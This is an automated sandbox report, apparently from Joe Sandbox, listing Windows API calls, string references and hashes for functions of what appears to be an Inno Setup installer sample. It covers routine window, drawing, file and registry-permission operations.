                                                                          • 73A0A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                          Strings
                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                          Similarity
                                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1435929781-222967699
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 004233BF
                                                                          • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                          • SetCursor.USER32(00000000), ref: 00423423
                                                                          Similarity
                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                          • String ID:
                                                                          • API String ID: 1770779139-0
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                          • API String ID: 667068680-2254406584
                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                          • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
                                                                          • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                          Similarity
                                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                          • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                          • API String ID: 2573145106-911929905
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(02300000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                          • GetProcAddress.KERNEL32(02300000,BZ2_bzDecompress), ref: 0045CDC1
                                                                          • GetProcAddress.KERNEL32(02300000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                          • API String ID: 190572456-212574377
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                          • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                            • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                            • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                            • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                          • API String ID: 142928637-2676053874
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                          • API String ID: 667068680-222143506
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B755
                                                                          • 73A0A570.USER32(?), ref: 0041B761
                                                                          • 73A08830.GDI32(00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B796
                                                                          • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B82C,?,?), ref: 0041B7A2
                                                                          • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B7D0
                                                                          • 73A08830.GDI32(00000000,00000000,00000000,0041B811,?,?,00000000,00000000,0041B80A,?,00000000,0041B82C,?,?), ref: 0041B804
                                                                          Similarity
                                                                          • API ID: A08830$A022A16310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3731147114-0
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041BA27
                                                                          • 73A0A570.USER32(?), ref: 0041BA33
                                                                          • 73A08830.GDI32(00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA6D
                                                                          • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAF9,?,?), ref: 0041BA79
                                                                          • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BA9D
                                                                          • 73A08830.GDI32(00000000,00000000,00000000,0041BADE,?,?,00000000,00000000,0041BAD7,?,00000000,0041BAF9,?,?), ref: 0041BAD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A08830$A022A16310A570Focus
                                                                          • String ID:
                                                                          • API String ID: 3731147114-0
                                                                          • Opcode ID: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                          • Instruction ID: 8a06375b061ea5bfc02952791cdae78cf5b61e443f36c9dad2d84499db0416b2
                                                                          • Opcode Fuzzy Hash: 001e89b2f4c2121d9a6ec2d11db6f12347d51ba97533173606e056219e37f7cb
                                                                          • Instruction Fuzzy Hash: FE510975A002189FCB11DFA9C891AAEBBF9FF49700F15806AF504EB751D7789D40CBA4
                                                                          APIs
                                                                          • GetFocus.USER32 ref: 0041B58E
                                                                          • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                          • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                          • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                          • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                          • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: E680$A14620A480A570Focus
                                                                          • String ID:
                                                                          • API String ID: 932946509-0
                                                                          • Opcode ID: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                          • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                          • Opcode Fuzzy Hash: 90736dfb4065eff224967c8bcb4d67110e7e5550b3a77470f42cb8b0a49e908e
                                                                          • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                          APIs
                                                                          • SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                          • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045C8A4,?,00000000,0045C838,?,?,?,?,00000000), ref: 0045C816
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                          • API String ID: 1452528299-1580325520
                                                                          • Opcode ID: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                          • Instruction ID: f1a5a0da2dcc97a3faf8a15e8aeeb0a96b83315a605ea6bcd06888aa97a57620
                                                                          • Opcode Fuzzy Hash: ef918fb2a5af0324286362805bab636c6eae7542a12872d5b8c908973a1048fb
                                                                          • Instruction Fuzzy Hash: 3111D835200305BFD711EAA1C9C1A9ABAACDB48707F6040776D0092783D73C9F0AD96D
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                          • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                          • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                          • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                          • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                          • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A14620MetricsSystem$A480A570
                                                                          • String ID:
                                                                          • API String ID: 1130675633-0
                                                                          • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                          • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                          • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                          • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047CC9E
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046BD7C), ref: 0047CCC4
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0047CCD4
                                                                          • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047CCF5
                                                                          • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047CD09
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047CD25
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long$Show
                                                                          • String ID:
                                                                          • API String ID: 3609083571-0
                                                                          • Opcode ID: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                          • Instruction ID: b9d10cbe0955a365ec79174b91f205d0e2d6322d15c7b647bae3529478a090fa
                                                                          • Opcode Fuzzy Hash: 945f3c3bef6479fa77638ae1ae675c7ba863dfa3b4bcef5104c996364b2eaea0
                                                                          • Instruction Fuzzy Hash: 9A010CB5651210ABD710D7A8CD81F663798AB1D334F09067AB999DF2E2C629DC108B49
                                                                          APIs
                                                                            • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                          • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                          • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                            • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                          • String ID:
                                                                          • API String ID: 3527656728-0
                                                                          • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                          • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                          • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: $pI$.tmp$}RI
                                                                          • API String ID: 3498533004-1860564545
                                                                          • Opcode ID: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                          • Instruction ID: 59b3140617fbadefd4c9ffb48c61b81df6a531bfad3e19e72d5fef91abd571f9
                                                                          • Opcode Fuzzy Hash: 8789a208b1386c54c911cfdfe787610a42f1868093a374a585ebd63c8429b2e4
                                                                          • Instruction Fuzzy Hash: 0031A770A00219ABCB11EF95D942B9FBBB5AF45715F60412BF800B73C2D6785F0587AD
                                                                          APIs
                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          • ShowWindow.USER32(?,00000005,00000000,00496485,?,?,00000000), ref: 00496256
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                            • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                            • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                          • String ID: .dat$.msg$IMsg$Uninstall
                                                                          • API String ID: 3312786188-1660910688
                                                                          • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                          • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                          • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                          • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                          • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$Move
                                                                          • String ID: $pI$isRS-%.3u.tmp
                                                                          • API String ID: 3839737484-4128586672
                                                                          • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                          • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                          • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                          • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                          • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                          • API String ID: 828529508-2866557904
APIs
• RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID: Mj
• API String ID: 730355536-209792402
APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: $pI$DeleteFile$MoveFile
• API String ID: 3024442154-1403374609
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
• InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 3478007392-2498399450
APIs
• GetWindowThreadProcessId.USER32(00000000), ref: 00476644
• GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
Similarity
• API ID: AddressHandleModuleProcProcessThreadWindow
• String ID: AllowSetForegroundWindow$user32.dll
• API String ID: 1782028327-3855017861
APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
Similarity
• API ID: AddressHandleModuleProc
• String ID: NotifyWinEvent$dD$user32.dll
• API String ID: 1646373207-754903266
APIs
• BeginPaint.USER32(00000000,?), ref: 00416C62
• SaveDC.GDI32(?), ref: 00416C93
• ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
• RestoreDC.GDI32(?,?), ref: 00416D1B
• EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
Similarity
• API ID: Paint$BeginClipExcludeRectRestoreSave
• API String ID: 3808407030-0
APIs
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
• SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
• SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
• SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
• SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
Similarity
• API ID: MessageSend
• API String ID: 3850602802-0
APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
• GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
• 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
• 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
• DeleteObject.GDI32(00000000), ref: 0041BCAA
Similarity
• API ID: MetricsSystem$A16310A570DeleteObject
• API String ID: 2246927583-0
APIs
  • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
• GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
• GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
Strings
• Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
• Setting permissions on registry key: %s\%s, xrefs: 004725AE
• Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                          • API String ID: 1452528299-4018462623
                                                                          • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                          • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
